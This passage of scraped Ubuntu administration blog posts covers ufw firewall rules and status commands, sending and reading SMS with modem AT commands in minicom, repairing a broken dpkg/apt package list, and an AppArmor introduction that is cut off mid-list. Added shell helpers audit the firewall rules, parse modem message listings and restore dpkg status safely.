<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">:ufw-user-forward - [0:0]</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">:ufw-user-limit - [0:0]</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">:ufw-user-limit-accept - [0:0]</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">### RULES ###</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">### tuple ### allow tcp 80 0.0.0.0/0 any 0.0.0.0/0</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-input -p tcp --dport 80 -j ACCEPT</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">### END RULES ###</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-input -j RETURN</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-output -j RETURN</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-forward -j RETURN</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-limit -m limit --limit 3/minute -j LOG --log-prefix "[UFW LIMIT]: "</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-limit -j REJECT</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">-A ufw-user-limit-accept -j ACCEPT</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">COMMIT</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">Rules updated</span></span></div>
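The dry-run output above is plain iptables-restore text, so a rule can be checked before it is applied. The shell functions below are an added example, not part of the original post or of ufw itself: they list ACCEPT rules in the ufw-user-input chain that carry no source restriction. The function names and the port 22 sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: audit ufw --dry-run output for rules open to any source.

# world_open_rules: reads iptables-restore style text on stdin and prints
# "proto/port" for every ufw-user-input ACCEPT rule that has a destination
# port but no -s source match (or an explicit 0.0.0.0/0 source).
world_open_rules() {
    awk '
        $1 == "-A" && $2 == "ufw-user-input" {
            proto = ""; port = ""; src = ""; target = ""
            # Option order is not assumed; each flag is read with its value.
            for (i = 3; i < NF; i++) {
                if ($i == "-p")      proto  = $(i + 1)
                if ($i == "--dport") port   = $(i + 1)
                if ($i == "-s")      src    = $(i + 1)
                if ($i == "-j")      target = $(i + 1)
            }
            if (target == "ACCEPT" && port != "" && (src == "" || src == "0.0.0.0/0"))
                print proto "/" port
        }
    '
}

# sensitive_exposed PORT...: reads a ruleset on stdin. Prints each named port
# that is world-open and returns 0; returns 1 if none of them is.
sensitive_exposed() {
    open=$(world_open_rules)
    found=1
    for p in "$@"; do
        for r in $open; do
            if [ "${r#*/}" = "$p" ]; then
                echo "$r"
                found=0
            fi
        done
    done
    return $found
}

# Constructed sample 1: the port 80 line is the rule from the dry-run output
# above; the port 22 line is an assumed rendering of "ufw allow 22".
sample_open() {
    cat <<'EOF'
*filter
:ufw-user-input - [0:0]
### RULES ###
-A ufw-user-input -p tcp --dport 80 -j ACCEPT
-A ufw-user-input -p tcp --dport 22 -j ACCEPT
### END RULES ###
-A ufw-user-input -j RETURN
COMMIT
EOF
}

# Constructed sample 2: port 22 limited to one host, an assumed rendering of
# "ufw allow proto tcp from 192.168.0.2 to any port 22".
sample_restricted() {
    cat <<'EOF'
*filter
:ufw-user-input - [0:0]
### RULES ###
-A ufw-user-input -p tcp --dport 80 -j ACCEPT
-A ufw-user-input -p tcp --dport 22 -s 192.168.0.2 -j ACCEPT
### END RULES ###
-A ufw-user-input -j RETURN
COMMIT
EOF
}

# Demo on the constructed samples.
sample_open | sensitive_exposed 22
sample_restricted | sensitive_exposed 22 || echo "port 22 is source-restricted"
```

On a live host, pipe the output of a `sudo ufw --dry-run` command into `sensitive_exposed 22` to see whether the rule would expose ssh to every source before it is applied.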
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">ufw can be disabled by:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw disable</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">To see the firewall status, enter:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw status</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">And for more verbose status information use:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw status verbose</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">To view the numbered format:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw status numbered</b></span></span></div>
<br /></div>
AT-Commands (published 2012-12-28) <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial I will walk through the steps of sending and receiving text messages (SMS) from your Ubuntu laptop using a package called minicom. We also need a modem that dials into the telco provider. For this I use a USB Wifi modem.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPBOKGitY0gbbrJs1v-t3XTYTIIGnWTdA31ZEpC9u4lwTEWghWZJsT7FfNFTYEDhNcOkjI8CRwwuEobu00IP0zv0_pEwc2wyYVvUvs8Pi7U5ilrodhELOV8Jg9gdUrZsU7xDA_Uk7Zbvh5/s1600/minicom.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPBOKGitY0gbbrJs1v-t3XTYTIIGnWTdA31ZEpC9u4lwTEWghWZJsT7FfNFTYEDhNcOkjI8CRwwuEobu00IP0zv0_pEwc2wyYVvUvs8Pi7U5ilrodhELOV8Jg9gdUrZsU7xDA_Uk7Zbvh5/s1600/minicom.png" height="198" width="400" /></a></div>
<br />
<br />
First, connect the USB Wifi modem to a USB port on your laptop or PC, then start minicom. If it is not installed, you can install it by typing:<br />
<br />
<b># apt-get install minicom</b><br />
<br />
To launch minicom, type:<br />
<br />
<b>root@ubuntu:~/script# minicom -m</b><br />
<br />
Welcome to minicom 2.3<br />
<br />
OPTIONS: I18n<br />
<br />
<br />
<br />
Port /dev/ttyUSB1<br />
<br />
Press ESC,Z for help on special keys<br />
<br />
AT S7=45 S0=0 L1 V1 X4 &c1 E1 Q0<br />
<br />
OK<br />
<br />
You will get an OK prompt, which means that minicom recognizes the USB Wifi modem. You can configure the device from the OK prompt with a key combination: press Ctrl and A together and release, then press Z for the menu. In the menu, press O to configure minicom.<br />
<br />
One of the important settings is the serial port. In my case it is set to /dev/ttyUSB1. If you need to open a terminal session to a Cisco router, you can try /dev/ttyS0. To change the port, press Ctrl and A together and release, then press Z for the menu. In the menu, press O to configure minicom and select Serial Port setup.<br />
<br />
<br />
<br />
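Set Bps/Par/Bits to 115200 8N1.<br />
<br />
Now let’s send an SMS to your own mobile phone (handphone). At the OK prompt in minicom, type the commands below: at+cmgf=1 selects SMS text mode, at+cmgw stores the message and returns its storage index, and at+cmss sends the message stored at that index.<br />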
<br />
at+cmgf=1<br />
<br />
OK<br />
<br />
at+cmgw="some_mobile_number"<br />
<br />
For example,<br />
<br />
at+cmgw="12345678"<br />
<br />
> its fun<br />
<br />
><br />
<br />
Press Ctrl+Z when you finish typing your message. In my case I don’t need to type the country code +91.<br />
<br />
+CMGW: 1<br />
<br />
OK<br />
<br />
at+cmss=1<br />
<br />
+CMSS: 0<br />
<br />
OK<br />
<br />
My handphone received the SMS.<br />
<br />
To read the stored messages:<br />
<br />
at+cmgl="all"<br />
<br />
+CMGL: 1,"STO SENT","mobilenumber",,<br />
<br />
its fun<br />
<br />
+CMGL: 0,"STO UNSENT","+mobilenumber",,<br />
<br />
hello !!<br />
<br />
OK<br />
<br />
at+cmgr=0<br />
<br />
+CMGR: "STO UNSENT","+mobilenumber",<br />
<br />
hello !!<br />
<br />
OK<br />
<b><br /></b>
<b><br /></b>
<b>Making calls from Modem to Mobile Phone</b><br />
<br />
ATDmobilenumber;<br />
<br />
<b>Reading messages on your Wifi Modem SIM Card</b><br />
<br />
Read all the messages:<br />
<br />
at+cmgl="all"<br />
<br />
+CMGL: 0,"REC READ","+91mobilenumber",,"10/06/20,19:43:29+32"<br />
<br />
It works!<br />
<br />
+CMGL: 1,"REC UNREAD","+91mobilenumber",,"10/06/21,19:03:10+32"<br />
<br />
chill<br />
<br />
The latest SMS is unread<br />
<br />
Read the SMS<br />
<br />
at+cmgr=1<br />
<br />
+CMGR: "REC READ","+91mobilenumber",,"10/06/21,19:03:10+32"<br />
<br />
chill<br />
<br />
OK<br />
<br />
Now the status is read<br />
<br />
at+cmgl="all"<br />
<br />
+CMGL: 0,"REC READ","+91mobilenumber",,"10/06/20,19:43:29+32"<br />
<br />
It works!<br />
<br />
+CMGL: 1,"REC READ","+91mobilenumber",,"10/06/21,19:03:10+32"<br />
<br />
chill<br />
<br />
OK</div>
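The +CMGL listings shown in the post, parsed into one tab-separated row per message. This is an added example, not part of the original post; the function name `parse_cmgl` and the sample capture are constructed for it, and it assumes the modem is in text mode (at+cmgf=1).

```shell
#!/bin/sh
# Added example: turn a text-mode AT+CMGL listing into one TSV row per message.
# Output columns: index, status, number, timestamp, body.

# Constructed capture, modelled on the listings in the post
# (straight quotes, as the modem actually sends them).
SAMPLE_CMGL='at+cmgl="all"
+CMGL: 0,"REC READ","+91mobilenumber",,"10/06/20,19:43:29+32"
It works!
+CMGL: 1,"REC UNREAD","+91mobilenumber",,"10/06/21,19:03:10+32"
chill
+CMGL: 2,"STO SENT","mobilenumber",,
its fun

OK'

parse_cmgl() {
    # Modems terminate lines with CR LF; drop the CR before parsing.
    tr -d '\r' | awk '
    # Split a header payload on commas that are outside double quotes,
    # so the comma inside the timestamp does not start a new field.
    function split_fields(s, out,    i, c, n, inq, cur) {
        n = 0; inq = 0; cur = ""
        for (i = 1; i <= length(s); i++) {
            c = substr(s, i, 1)
            if (c == "\"") { inq = !inq; continue }
            if (c == "," && !inq) { out[++n] = cur; cur = ""; continue }
            cur = cur c
        }
        out[++n] = cur
        return n
    }
    # Print the message collected so far, if any.
    function emit() {
        if (have) printf "%s\t%s\t%s\t%s\t%s\n", idx, st, num, ts, body
        have = 0
    }
    /^\+CMGL: / {
        emit()
        n = split_fields(substr($0, 8), f)   # payload starts after "+CMGL: "
        idx = f[1]; st = f[2]; num = f[3]
        # Stored (STO ...) entries carry no timestamp: field 5 is empty.
        ts = (n >= 5) ? f[5] : ""
        body = ""; have = 1
        next
    }
    # A final result code ends the listing. In text mode a message whose
    # whole body is "OK" cannot be told apart from it.
    /^(OK|ERROR|\+CMS ERROR: .*)$/ { emit(); next }
    # Any other non-empty line after a header belongs to the message body.
    have && $0 != "" { body = (body == "" ? $0 : body " " $0) }
    END { emit() }
    '
}

# Stand-alone run on the constructed capture.
printf '%s\n' "$SAMPLE_CMGL" | parse_cmgl
```

To use it on a real session, save the minicom capture to a file and pipe that file into `parse_cmgl`.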
Reading package lists... Error! (published 2012-12-28) <div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY0bo43CZW_n6UBxXShC08E0oeNy7uvcwXZxW7dk0M__1nFbhLmBPteqrDoUXyvM5Zm_hhwzKVyuYU9nCzc1tOY8uzcbeezMEd4ksRJilbuSld1UJWq9sj9Cgkkj4syUYg7iNIhrTbGkqi/s1600/don_t_panic_button.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY0bo43CZW_n6UBxXShC08E0oeNy7uvcwXZxW7dk0M__1nFbhLmBPteqrDoUXyvM5Zm_hhwzKVyuYU9nCzc1tOY8uzcbeezMEd4ksRJilbuSld1UJWq9sj9Cgkkj4syUYg7iNIhrTbGkqi/s1600/don_t_panic_button.jpg" height="240" width="320" /></a></div>
<span style="font-family: Times, 'Times New Roman', serif; font-size: large;"><br /></span>
<ol style="text-align: left;">
<li><span style="font-family: Times, 'Times New Roman', serif; font-size: large;">rm /var/lib/dpkg/status<br /></span></li>
<li><span style="font-family: Times, 'Times New Roman', serif; font-size: large;">cp /var/lib/dpkg/status-old /var/lib/dpkg/status<br /></span></li>
<li><span style="font-family: Times, 'Times New Roman', serif; font-size: large;">rm -rf /var/lib/apt/lists/*<br /></span></li>
<li><span style="font-family: Times, 'Times New Roman', serif; font-size: large;">dpkg --configure -a<br /></span></li>
<li><span style="font-family: Times, 'Times New Roman', serif; font-size: large;">apt-get update<br /></span></li>
<li><span style="font-family: Times, 'Times New Roman', serif; font-size: large;">apt-get install -f</span></li>
</ol>
</div>
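Steps 1 and 2 of the list delete the live dpkg database before anything has checked that status-old is usable. The shell functions below are an added example, not part of the original post: they do the same replacement but refuse to proceed when status-old is missing or empty, and keep the damaged file instead of removing it. The function names and the `status.broken.*` backup name are assumptions of this example.

```shell
#!/bin/sh
# Added example: steps 1-2 of the list, with the current status file kept
# as a backup instead of deleted.
# Usage: restore_dpkg_status [DPKG_DIR]   (DPKG_DIR defaults to /var/lib/dpkg)

restore_dpkg_status() {
    dir=${1:-/var/lib/dpkg}
    old=$dir/status-old
    cur=$dir/status

    # Refuse to touch anything unless the fallback copy is usable.
    if [ ! -s "$old" ]; then
        echo "status-old missing or empty in $dir; leaving status untouched" >&2
        return 1
    fi
    if ! grep -q '^Package: ' "$old"; then
        echo "status-old has no Package: stanzas; leaving status untouched" >&2
        return 2
    fi

    # Keep the damaged file for later inspection rather than rm-ing it.
    if [ -e "$cur" ]; then
        backup=$cur.broken.$(date +%Y%m%d%H%M%S)
        cp -p "$cur" "$backup" || return 3
        echo "saved current status as $backup" >&2
    fi

    # Copy to a temporary name in the same directory, then rename, so an
    # interrupted copy never leaves a half-written status file.
    cp -p "$old" "$cur.new.$$" && mv -f "$cur.new.$$" "$cur" || return 4
    echo "restored $cur from $old" >&2
}

# Steps 3-6 of the list, unchanged; they need root and a network connection.
finish_apt_repair() {
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
    rm -rf /var/lib/apt/lists/* &&
    dpkg --configure -a &&
    apt-get update &&
    apt-get install -f
}
```

status-old is the database as it was before the last dpkg run, so packages changed in that run may need reinstalling afterwards. Debian and Ubuntu also keep dated copies under /var/backups (dpkg.status.*) as a further fallback.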
AppArmor (published 2012-12-28) <div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">AppArmor</span> is a Linux Security Module implementation of name-based mandatory access controls. AppArmor confines individual programs to a set of listed files and POSIX 1003.1e draft capabilities.</span></div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">AppArmor</span> is installed and loaded by default. It uses <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">profiles</span> of an application to determine what files and permissions the application requires. Some packages will install their own profiles, and additional profiles can be found in the <span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">apparmor-profiles</span> package.</span></div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">To install the <span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">apparmor-profiles</span> package from a terminal prompt:</span></div>
<div class="screen" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo apt-get install apparmor-profiles</span>
</span></pre>
</div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">AppArmor profiles have two modes of execution:</span></div>
<div class="list itemizedlist" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<ul class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 8px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
